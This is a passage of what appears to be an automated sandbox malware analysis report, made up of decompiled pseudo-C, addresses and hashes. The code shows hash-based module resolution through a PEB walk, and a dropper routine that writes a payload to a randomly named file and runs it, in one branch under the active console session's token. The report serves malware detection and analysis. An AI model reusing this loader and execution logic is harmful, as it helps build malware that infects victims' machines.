                                                                                        								_t543 =  *(_t612 + 0x54);
                                                                                        								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
                                                                                        								 *( *(_t612 + 0x28)) = _t543;
                                                                                        								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
                                                                                        								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
                                                                                        								_t200 = _t612 + 0x38;
                                                                                        								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                                                                                        								if( *_t200 == 0) {
                                                                                        									_t453 =  *(_t612 + 0x28);
                                                                                        									 *(_t612 + 0x2c) = _t453;
                                                                                        									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                                                                                        									 *(_t612 + 0x28) =  &(_t453[0]);
                                                                                        								}
                                                                                        								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
                                                                                        								if(_t508 < 0x80) {
                                                                                        									_t528 = _v56;
                                                                                        									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
                                                                                        									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
                                                                                        									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
                                                                                        								} else {
                                                                                        									_t213 = _t508 - 3; // -3
                                                                                        									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
                                                                                        									_t216 = _t602 - 1; // -1
                                                                                        									_t514 = _t216;
                                                                                        									_t590 = _t514 >> 8;
                                                                                        									 *( *(_t612 + 0x28)) = _t213;
                                                                                        									( *(_t612 + 0x28))[1] = _t514;
                                                                                        									( *(_t612 + 0x28))[2] = _t590;
                                                                                        									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                                                                                        									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                                                                                        									_t224 = _t612 + 0x38;
                                                                                        									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                                                                                        									if( *_t224 == 0) {
                                                                                        										_t451 =  *(_t612 + 0x28);
                                                                                        										 *(_t612 + 0x2c) = _t451;
                                                                                        										 *((intOrPtr*)(_t612 + 0x38)) = 8;
                                                                                        										 *(_t612 + 0x28) =  &(_t451[0]);
                                                                                        									}
                                                                                        									_t591 = _t590 & 0x0000007f;
                                                                                        									_t230 = (_t514 & 0x000001ff) + 0xd1b220; // 0x201001d
                                                                                        									_t231 = _t591 + 0xd1b1a0; // 0x12000000
                                                                                        									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
                                                                                        									_t528 = _v16;
                                                                                        									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
                                                                                        									if(_t528 >= 3) {
                                                                                        										 *((short*)(_t612 + 0x8192 + ( *(0xd1b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xd1b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
                                                                                        									}
                                                                                        									 *((intOrPtr*)(_t612 + 0x50)) = 0;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L95;
                                                                                        					} else {
                                                                                        						break;
                                                                                        					}
                                                                                        					L103:
                                                                                        				}
                                                                                        				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
                                                                                        				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
                                                                                        				return 1;
                                                                                        				goto L103;
                                                                                        			}

























































































                                                                                        0x00d177f8
                                                                                        0x00d177fb
                                                                                        0x00d177fe
                                                                                        0x00d17804
                                                                                        0x00d1780a
                                                                                        0x00d17810
                                                                                        0x00d17813
                                                                                        0x00d17816
                                                                                        0x00000000
                                                                                        0x00d17820
                                                                                        0x00d17838
                                                                                        0x00d17840
                                                                                        0x00d179c6
                                                                                        0x00d179d0
                                                                                        0x00d179d0
                                                                                        0x00d179d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d179e2
                                                                                        0x00d179e3
                                                                                        0x00d179e7
                                                                                        0x00d179ec
                                                                                        0x00d179ef
                                                                                        0x00d179f0
                                                                                        0x00d179f3
                                                                                        0x00d179ff
                                                                                        0x00d17a01
                                                                                        0x00d17a01
                                                                                        0x00d17a08
                                                                                        0x00d17a0e
                                                                                        0x00d17a16
                                                                                        0x00d17a1e
                                                                                        0x00d17a25
                                                                                        0x00d17a38
                                                                                        0x00d17a56
                                                                                        0x00d17a60
                                                                                        0x00d17a68
                                                                                        0x00d17a6b
                                                                                        0x00d17a73
                                                                                        0x00d17a73
                                                                                        0x00d17a78
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17a7e
                                                                                        0x00000000
                                                                                        0x00d17a78
                                                                                        0x00d179d0
                                                                                        0x00d17846
                                                                                        0x00d17849
                                                                                        0x00d1784d
                                                                                        0x00d17853
                                                                                        0x00d17853
                                                                                        0x00d17865
                                                                                        0x00d17878
                                                                                        0x00d17887
                                                                                        0x00d1788b
                                                                                        0x00d17890
                                                                                        0x00d17893
                                                                                        0x00d17896
                                                                                        0x00d17899
                                                                                        0x00d1789f
                                                                                        0x00d178a1
                                                                                        0x00d178a4
                                                                                        0x00d178a7
                                                                                        0x00d178b4
                                                                                        0x00d178b6
                                                                                        0x00d178b6
                                                                                        0x00d178ce
                                                                                        0x00d178d4
                                                                                        0x00d178e2
                                                                                        0x00d178ea
                                                                                        0x00d178ed
                                                                                        0x00d178f5
                                                                                        0x00d178f6
                                                                                        0x00d178fb
                                                                                        0x00d178fb
                                                                                        0x00d178fe
                                                                                        0x00d178fe
                                                                                        0x00d1790d
                                                                                        0x00d17914
                                                                                        0x00d17917
                                                                                        0x00d1791a
                                                                                        0x00d17928
                                                                                        0x00d1792b
                                                                                        0x00d1792f
                                                                                        0x00d17937
                                                                                        0x00d1793e
                                                                                        0x00d17941
                                                                                        0x00d17944
                                                                                        0x00d17947
                                                                                        0x00d1794a
                                                                                        0x00d17958
                                                                                        0x00d1795b
                                                                                        0x00d17a8a
                                                                                        0x00d17a8f
                                                                                        0x00d17a92
                                                                                        0x00d17a95
                                                                                        0x00d17a9a
                                                                                        0x00d17a9d
                                                                                        0x00d17aa3
                                                                                        0x00d17aac
                                                                                        0x00d17abb
                                                                                        0x00d17ac8
                                                                                        0x00d17acd
                                                                                        0x00d17b13
                                                                                        0x00d17b13
                                                                                        0x00d17b13
                                                                                        0x00d17b16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17b18
                                                                                        0x00d17b22
                                                                                        0x00000000
                                                                                        0x00d17b24
                                                                                        0x00d17b29
                                                                                        0x00d17b2c
                                                                                        0x00d17b31
                                                                                        0x00000000
                                                                                        0x00d17b33
                                                                                        0x00d17b36
                                                                                        0x00d17b3f
                                                                                        0x00d17b49
                                                                                        0x00d17bc0
                                                                                        0x00d17bc2
                                                                                        0x00000000
                                                                                        0x00d17bc8
                                                                                        0x00d17bd1
                                                                                        0x00d17bd4
                                                                                        0x00d17bd9
                                                                                        0x00d17b10
                                                                                        0x00000000
                                                                                        0x00d17bdf
                                                                                        0x00d17be8
                                                                                        0x00d17bea
                                                                                        0x00d17bf0
                                                                                        0x00d17bf0
                                                                                        0x00d17bf4
                                                                                        0x00d17bf7
                                                                                        0x00d17bfd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17bff
                                                                                        0x00d17c03
                                                                                        0x00d17c06
                                                                                        0x00d17c0c
                                                                                        0x00d17c0e
                                                                                        0x00d17c12
                                                                                        0x00d17c15
                                                                                        0x00d17c1b
                                                                                        0x00d17c1d
                                                                                        0x00d17c21
                                                                                        0x00d17c24
                                                                                        0x00d17c2a
                                                                                        0x00d17c2c
                                                                                        0x00d17c2d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17c2d
                                                                                        0x00d17c2a
                                                                                        0x00d17c1b
                                                                                        0x00000000
                                                                                        0x00d17c0c
                                                                                        0x00d17c31
                                                                                        0x00d17c34
                                                                                        0x00d17c37
                                                                                        0x00d17ca0
                                                                                        0x00d17ca5
                                                                                        0x00d17ca9
                                                                                        0x00000000
                                                                                        0x00d17c39
                                                                                        0x00d17c41
                                                                                        0x00d17c4e
                                                                                        0x00d17c54
                                                                                        0x00d17c57
                                                                                        0x00d17c5d
                                                                                        0x00000000
                                                                                        0x00d17c63
                                                                                        0x00d17c68
                                                                                        0x00d17c6b
                                                                                        0x00d17c70
                                                                                        0x00d17c73
                                                                                        0x00d17c76
                                                                                        0x00d17c78
                                                                                        0x00d17c7d
                                                                                        0x00000000
                                                                                        0x00d17c83
                                                                                        0x00d17c86
                                                                                        0x00d17c8b
                                                                                        0x00d17c93
                                                                                        0x00000000
                                                                                        0x00d17c93
                                                                                        0x00d17c7d
                                                                                        0x00d17c5d
                                                                                        0x00d17c37
                                                                                        0x00d17bd9
                                                                                        0x00d17b4b
                                                                                        0x00d17b4b
                                                                                        0x00d17b55
                                                                                        0x00000000
                                                                                        0x00d17b5b
                                                                                        0x00d17b60
                                                                                        0x00d17b63
                                                                                        0x00d17b69
                                                                                        0x00000000
                                                                                        0x00d17b6f
                                                                                        0x00d17b72
                                                                                        0x00d17b80
                                                                                        0x00000000
                                                                                        0x00d17b82
                                                                                        0x00d17b82
                                                                                        0x00d17b8c
                                                                                        0x00000000
                                                                                        0x00d17b92
                                                                                        0x00d17b97
                                                                                        0x00d17b9a
                                                                                        0x00d17ba0
                                                                                        0x00000000
                                                                                        0x00d17ba6
                                                                                        0x00d17ba9
                                                                                        0x00d17bb7
                                                                                        0x00d17bba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17bba
                                                                                        0x00d17ba0
                                                                                        0x00d17b8c
                                                                                        0x00d17b80
                                                                                        0x00d17b69
                                                                                        0x00d17b55
                                                                                        0x00d17b49
                                                                                        0x00d17b31
                                                                                        0x00d17f55
                                                                                        0x00d17f55
                                                                                        0x00d17f58
                                                                                        0x00d17f5e
                                                                                        0x00d17f67
                                                                                        0x00d17f70
                                                                                        0x00d17f73
                                                                                        0x00d17f78
                                                                                        0x00d17fb1
                                                                                        0x00d17fb6
                                                                                        0x00d17fb9
                                                                                        0x00d17fc1
                                                                                        0x00d17fcc
                                                                                        0x00d17fd0
                                                                                        0x00d18002
                                                                                        0x00d17fd2
                                                                                        0x00d17fd2
                                                                                        0x00000000
                                                                                        0x00d17fd2
                                                                                        0x00d17f7a
                                                                                        0x00d17f7a
                                                                                        0x00d17f7d
                                                                                        0x00d17f80
                                                                                        0x00d17f89
                                                                                        0x00d1781b
                                                                                        0x00d1781b
                                                                                        0x00000000
                                                                                        0x00d17f8f
                                                                                        0x00d17f9f
                                                                                        0x00000000
                                                                                        0x00d17fa1
                                                                                        0x00d17fa8
                                                                                        0x00d17fab
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d17fab
                                                                                        0x00d17f9f
                                                                                        0x00d17f89
                                                                                        0x00000000
                                                                                        0x00d17f78
                                                                                        0x00000000
                                                                                        0x00d17acf
                                                                                        0x00d17acf
                                                                                        0x00d17acf
                                                                                        0x00d17acf
                                                                                        0x00000000
                                                                                        0x00d17961
                                                                                        0x00d17963
                                                                                        0x00d17ad2
                                                                                        0x00d17ad5
                                                                                        0x00000000
                                                                                        0x00d17cb1
                                                                                        0x00d17cb1
                                                                                        0x00d17cb4
                                                                                        0x00000000
                                                                                        0x00d17cb4
                                                                                        0x00d17976
                                                                                        0x00d17979
                                                                                        0x00d1797c
                                                                                        0x00d17984
                                                                                        0x00d1798d
                                                                                        0x00d17a83
                                                                                        0x00d17a83
                                                                                        0x00d17a85
                                                                                        0x00d17ae3
                                                                                        0x00d17ae3
                                                                                        0x00d17ae6
                                                                                        0x00d17aeb
                                                                                        0x00d17cb7
                                                                                        0x00d17cb7
                                                                                        0x00d17cb9
                                                                                        0x00d17cbb
                                                                                        0x00d17af1
                                                                                        0x00d17af7
                                                                                        0x00000000
                                                                                        0x00d17b06
                                                                                        0x00d17af7
                                                                                        0x00d17993
                                                                                        0x00d17996
                                                                                        0x00d179a0
                                                                                        0x00d179a9
                                                                                        0x00d179ac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d179ac
                                                                                        0x00d179ae
                                                                                        0x00d179b4
                                                                                        0x00000000
                                                                                        0x00d179ba
                                                                                        0x00d179ba
                                                                                        0x00000000
                                                                                        0x00d179ba
                                                                                        0x00d179b4
                                                                                        0x00d1798d
                                                                                        0x00d17963
                                                                                        0x00d17cbe
                                                                                        0x00d17cc3
                                                                                        0x00d17e53
                                                                                        0x00d17e9b
                                                                                        0x00d17ed3
                                                                                        0x00d17ed6
                                                                                        0x00d17ed9
                                                                                        0x00d17ed9
                                                                                        0x00d17ede
                                                                                        0x00d17ee1
                                                                                        0x00d17ee6
                                                                                        0x00d17eec
                                                                                        0x00d17ef2
                                                                                        0x00d17efc
                                                                                        0x00d17efe
                                                                                        0x00d17efe
                                                                                        0x00d17f01
                                                                                        0x00d17f03
                                                                                        0x00d17f06
                                                                                        0x00d17f0a
                                                                                        0x00d17f11
                                                                                        0x00d17f11
                                                                                        0x00d17f16
                                                                                        0x00d17f24
                                                                                        0x00d17f2b
                                                                                        0x00d17f32
                                                                                        0x00d17f35
                                                                                        0x00d17f38
                                                                                        0x00d17f43
                                                                                        0x00d17f45
                                                                                        0x00000000
                                                                                        0x00d17f45
                                                                                        0x00d17ead
                                                                                        0x00d17ead
                                                                                        0x00d17eb7
                                                                                        0x00d17ec2
                                                                                        0x00d17ec5
                                                                                        0x00d17ec8
                                                                                        0x00d17ec8
                                                                                        0x00d17e55
                                                                                        0x00d17e5c
                                                                                        0x00d17e5f
                                                                                        0x00d17e69
                                                                                        0x00d17e6c
                                                                                        0x00d17e71
                                                                                        0x00d17e74
                                                                                        0x00d17e76
                                                                                        0x00d17e76
                                                                                        0x00d17e79
                                                                                        0x00d17e7b
                                                                                        0x00d17e7e
                                                                                        0x00d17e82
                                                                                        0x00d17e89
                                                                                        0x00d17e89
                                                                                        0x00d17e8c
                                                                                        0x00d17e8f
                                                                                        0x00d17f4d
                                                                                        0x00d17f4d
                                                                                        0x00d17f4d
                                                                                        0x00d17cc9
                                                                                        0x00d17ccb
                                                                                        0x00d17dbb
                                                                                        0x00d17dc7
                                                                                        0x00d17dca
                                                                                        0x00d17dcf
                                                                                        0x00d17dd2
                                                                                        0x00d17dd8
                                                                                        0x00d17dde
                                                                                        0x00d17de8
                                                                                        0x00d17dea
                                                                                        0x00d17dea
                                                                                        0x00d17ded
                                                                                        0x00d17def
                                                                                        0x00d17df2
                                                                                        0x00d17df6
                                                                                        0x00d17dfd
                                                                                        0x00d17dfd
                                                                                        0x00d17e1e
                                                                                        0x00d17e21
                                                                                        0x00d17e29
                                                                                        0x00d17e2f
                                                                                        0x00d17e39
                                                                                        0x00d17e39
                                                                                        0x00d17e44
                                                                                        0x00d17e45
                                                                                        0x00d17cd1
                                                                                        0x00d17cd4
                                                                                        0x00d17cd7
                                                                                        0x00d17cda
                                                                                        0x00d17cdf
                                                                                        0x00d17ce2
                                                                                        0x00d17ce4
                                                                                        0x00d17ce4
                                                                                        0x00d17ce7
                                                                                        0x00d17ce9
                                                                                        0x00d17cec
                                                                                        0x00d17cf0
                                                                                        0x00d17cf7
                                                                                        0x00d17cf7
                                                                                        0x00d17cfd
                                                                                        0x00d17d0b
                                                                                        0x00d17daa
                                                                                        0x00d17dad
                                                                                        0x00d17db0
                                                                                        0x00d17db3
                                                                                        0x00d17d11
                                                                                        0x00d17d14
                                                                                        0x00d17d17
                                                                                        0x00d17d1a
                                                                                        0x00d17d1a
                                                                                        0x00d17d1f
                                                                                        0x00d17d22
                                                                                        0x00d17d27
                                                                                        0x00d17d2d
                                                                                        0x00d17d33
                                                                                        0x00d17d3d
                                                                                        0x00d17d3f
                                                                                        0x00d17d3f
                                                                                        0x00d17d42
                                                                                        0x00d17d44
                                                                                        0x00d17d47
                                                                                        0x00d17d4b
                                                                                        0x00d17d52
                                                                                        0x00d17d52
                                                                                        0x00d17d57
                                                                                        0x00d17d65
                                                                                        0x00d17d6c
                                                                                        0x00d17d73
                                                                                        0x00d17d76
                                                                                        0x00d17d79
                                                                                        0x00d17d84
                                                                                        0x00d17d8e
                                                                                        0x00d17d8e
                                                                                        0x00d17d96
                                                                                        0x00d17d96
                                                                                        0x00d17d0b
                                                                                        0x00d17ccb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d1791a
                                                                                        0x00d17fe2
                                                                                        0x00d17fe9
                                                                                        0x00d17ff4
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48bd178317ea66bc6af6e0f4456f913979e0abb8a64242c725335806ab1eb9b5
                                                                                        • Instruction ID: dc9856fe7069d71c5172c9d1719b3b2cbeccd73abb10b20802c45d2124d156a2
                                                                                        • Opcode Fuzzy Hash: 48bd178317ea66bc6af6e0f4456f913979e0abb8a64242c725335806ab1eb9b5
                                                                                        • Instruction Fuzzy Hash: 3342AE35A08B459FCB25CF69D4906EAB7F2FF48300F18896DD49A97761DB34E981CB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E00D11BE0(intOrPtr __ecx) {
                                                                                        				intOrPtr _v8;
                                                                                        				signed int _t9;
                                                                                        				signed int _t11;
                                                                                        				intOrPtr* _t14;
                                                                                        				signed int _t19;
                                                                                        				intOrPtr* _t22;
                                                                                        				signed short* _t27;
                                                                                        
                                                                                        				_push(__ecx);
                                                                                        				_t14 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                                                                                        				_v8 = __ecx;
                                                                                        				_t22 =  *_t14;
                                                                                        				if(_t22 == _t14) {
                                                                                        					L9:
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					do {
                                                                                        						_t27 =  *(_t22 + 0x30);
                                                                                        						_t19 = 0;
                                                                                        						_t9 =  *_t27 & 0x0000ffff;
                                                                                        						while(_t9 != 0) {
                                                                                        							_t4 = _t9 - 0x41; // -17
                                                                                        							_t11 = _t9 & 0x0000ffff;
                                                                                        							if(_t4 <= 0x19) {
                                                                                        								_t11 = _t11 + 0x20;
                                                                                        							}
                                                                                        							_t27 =  &(_t27[1]);
                                                                                        							_t19 = _t19 * 0x1003f + _t11;
                                                                                        							_t9 =  *_t27 & 0x0000ffff;
                                                                                        						}
                                                                                        						if(_t19 == _v8) {
                                                                                        							return  *((intOrPtr*)(_t22 + 0x18));
                                                                                        						} else {
                                                                                        							goto L8;
                                                                                        						}
                                                                                        						goto L11;
                                                                                        						L8:
                                                                                        						_t22 =  *_t22;
                                                                                        					} while (_t22 != _t14);
                                                                                        					goto L9;
                                                                                        				}
                                                                                        				L11:
                                                                                        			}










                                                                                        0x00d11be3
                                                                                        0x00d11bf0
                                                                                        0x00d11bf3
                                                                                        0x00d11bf6
                                                                                        0x00d11bfa
                                                                                        0x00d11c3d
                                                                                        0x00d11c45
                                                                                        0x00d11c00
                                                                                        0x00d11c00
                                                                                        0x00d11c00
                                                                                        0x00d11c03
                                                                                        0x00d11c05
                                                                                        0x00d11c0b
                                                                                        0x00d11c10
                                                                                        0x00d11c13
                                                                                        0x00d11c1a
                                                                                        0x00d11c1c
                                                                                        0x00d11c1c
                                                                                        0x00d11c25
                                                                                        0x00d11c28
                                                                                        0x00d11c2a
                                                                                        0x00d11c2d
                                                                                        0x00d11c35
                                                                                        0x00d11c4f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11c37
                                                                                        0x00d11c37
                                                                                        0x00d11c39
                                                                                        0x00000000
                                                                                        0x00d11c00
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
                                                                                        • Instruction ID: dccdaf7e692db36d0ce289cd04eec024d3aecebecdd7610652aa2347ccf4d5df
                                                                                        • Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
                                                                                        • Instruction Fuzzy Hash: 9501FC77640019ABCB20CF4AE5805F9F3F6FB9436579D4069DA4887200EB31ADD1C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 63%
                                                                                        			E00D1A3A0(long _a4) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				struct _PROCESS_INFORMATION _v28;
                                                                                        				struct _STARTUPINFOW _v96;
                                                                                        				char _v156;
                                                                                        				char _v284;
                                                                                        				short _v804;
                                                                                        				char _v1324;
                                                                                        				void* _t58;
                                                                                        				signed int _t62;
                                                                                        				WCHAR* _t68;
                                                                                        				long _t89;
                                                                                        				signed int _t93;
                                                                                        				WCHAR* _t99;
                                                                                        				void* _t122;
                                                                                        				void* _t123;
                                                                                        				void* _t136;
                                                                                        				void* _t139;
                                                                                        				void* _t140;
                                                                                        				void* _t143;
                                                                                        				void* _t144;
                                                                                        				void* _t145;
                                                                                        				void* _t146;
                                                                                        
                                                                                        				_t136 = _a4;
                                                                                        				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
                                                                                        				if(_t58 == 0) {
                                                                                        					_t122 =  *(_t136 + 8);
                                                                                        					_a4 =  *((intOrPtr*)(_t136 + 0xc));
                                                                                        					 *0xd1c214(0, 0x23, 0, 0,  &_v804);
                                                                                        					_t62 = GetTickCount();
                                                                                        					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
                                                                                        					E00D12240( &_v284, _t39);
                                                                                        					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
                                                                                        					E00D11830(0xd115a4, 0xc, 0x435ca571,  &_v12);
                                                                                        					_t139 = _v12;
                                                                                        					_t68 =  &_v804;
                                                                                        					 *0xd1c200(_t68, 0x104, _t139, _t68,  &_v284);
                                                                                        					HeapFree(GetProcessHeap(), 0, _t139);
                                                                                        					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                        					if(_t140 == 0xffffffff) {
                                                                                        						L13:
                                                                                        						HeapFree(GetProcessHeap(), 0, _t136);
                                                                                        						return 0;
                                                                                        					}
                                                                                        					WriteFile(_t140, _t122, _a4,  &_a4, 0);
                                                                                        					CloseHandle(_t140);
                                                                                        					memset( &_v96, 0, 0x44);
                                                                                        					_v96.cb = 0x44;
                                                                                        					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					CloseHandle(_v28.hProcess);
                                                                                        					_push(_v28.hThread);
                                                                                        					L12:
                                                                                        					CloseHandle();
                                                                                        					goto L13;
                                                                                        				}
                                                                                        				if(_t58 != 1) {
                                                                                        					goto L13;
                                                                                        				}
                                                                                        				_t89 =  *((intOrPtr*)(_t136 + 0xc));
                                                                                        				_t123 =  *(_t136 + 8);
                                                                                        				_v12 = _t89;
                                                                                        				_a4 = 0;
                                                                                        				__imp__WTSGetActiveConsoleSessionId();
                                                                                        				if(_t89 == 0xffffffff) {
                                                                                        					goto L13;
                                                                                        				}
                                                                                        				_push( &_v8);
                                                                                        				_push(_t89);
                                                                                        				if( *0xd1c224() != 0) {
                                                                                        					 *0xd1c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
                                                                                        					CloseHandle(_v8);
                                                                                        				}
                                                                                        				 *0xd1c214(0, 0x23, 0, 0,  &_v804);
                                                                                        				_t93 = GetTickCount();
                                                                                        				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
                                                                                        				E00D12240( &_v156, _t13);
                                                                                        				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
                                                                                        				E00D11830(0xd115a4, 0xc, 0x435ca571,  &_v8);
                                                                                        				_t143 = _v8;
                                                                                        				_t99 =  &_v804;
                                                                                        				 *0xd1c200(_t99, 0x104, _t143, _t99,  &_v156);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t143);
                                                                                        				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                        				if(_t144 != 0xffffffff) {
                                                                                        					WriteFile(_t144, _t123, _v12,  &_v12, 0);
                                                                                        					CloseHandle(_t144);
                                                                                        					E00D11830(0xd11398, 4, 0x435ca571,  &_v8);
                                                                                        					_t145 = _v8;
                                                                                        					 *0xd1c200( &_v1324, 0x104, _t145,  &_v804);
                                                                                        					HeapFree(GetProcessHeap(), 0, _t145);
                                                                                        					if(E00D12180( &_v1324, _a4,  &_v28) != 0) {
                                                                                        						CloseHandle(_v28);
                                                                                        						CloseHandle(_v28.hThread);
                                                                                        					}
                                                                                        				}
                                                                                        				_push(_a4);
                                                                                        				goto L12;
                                                                                        			}


























                                                                                        0x00d1a3ac
                                                                                        0x00d1a3b2
                                                                                        0x00d1a3b3
                                                                                        0x00d1a550
                                                                                        0x00d1a553
                                                                                        0x00d1a565
                                                                                        0x00d1a56b
                                                                                        0x00d1a57c
                                                                                        0x00d1a57f
                                                                                        0x00d1a58b
                                                                                        0x00d1a5a1
                                                                                        0x00d1a5a6
                                                                                        0x00d1a5b0
                                                                                        0x00d1a5be
                                                                                        0x00d1a5d1
                                                                                        0x00d1a5f6
                                                                                        0x00d1a5fb
                                                                                        0x00d1a666
                                                                                        0x00d1a670
                                                                                        0x00d1a67e
                                                                                        0x00d1a67e
                                                                                        0x00d1a608
                                                                                        0x00d1a60f
                                                                                        0x00d1a61d
                                                                                        0x00d1a626
                                                                                        0x00d1a652
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d1a657
                                                                                        0x00d1a65d
                                                                                        0x00d1a660
                                                                                        0x00d1a660
                                                                                        0x00000000
                                                                                        0x00d1a660
                                                                                        0x00d1a3ba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d1a3c0
                                                                                        0x00d1a3c3
                                                                                        0x00d1a3c6
                                                                                        0x00d1a3c9
                                                                                        0x00d1a3d0
                                                                                        0x00d1a3d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d1a3e2
                                                                                        0x00d1a3e3
                                                                                        0x00d1a3ec
                                                                                        0x00d1a400
                                                                                        0x00d1a409
                                                                                        0x00d1a409
                                                                                        0x00d1a41e
                                                                                        0x00d1a424
                                                                                        0x00d1a435
                                                                                        0x00d1a438
                                                                                        0x00d1a444
                                                                                        0x00d1a45a
                                                                                        0x00d1a45f
                                                                                        0x00d1a469
                                                                                        0x00d1a477
                                                                                        0x00d1a48a
                                                                                        0x00d1a4af
                                                                                        0x00d1a4b4
                                                                                        0x00d1a4c5
                                                                                        0x00d1a4cc
                                                                                        0x00d1a4e5
                                                                                        0x00d1a4ea
                                                                                        0x00d1a501
                                                                                        0x00d1a514
                                                                                        0x00d1a531
                                                                                        0x00d1a536
                                                                                        0x00d1a53f
                                                                                        0x00d1a53f
                                                                                        0x00d1a531
                                                                                        0x00d1a545
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • WTSGetActiveConsoleSessionId.KERNEL32 ref: 00D1A3D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1A409
                                                                                        • GetTickCount.KERNEL32 ref: 00D1A424
                                                                                        • _snwprintf.NTDLL ref: 00D1A477
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D1A483
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1A48A
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D1A4A9
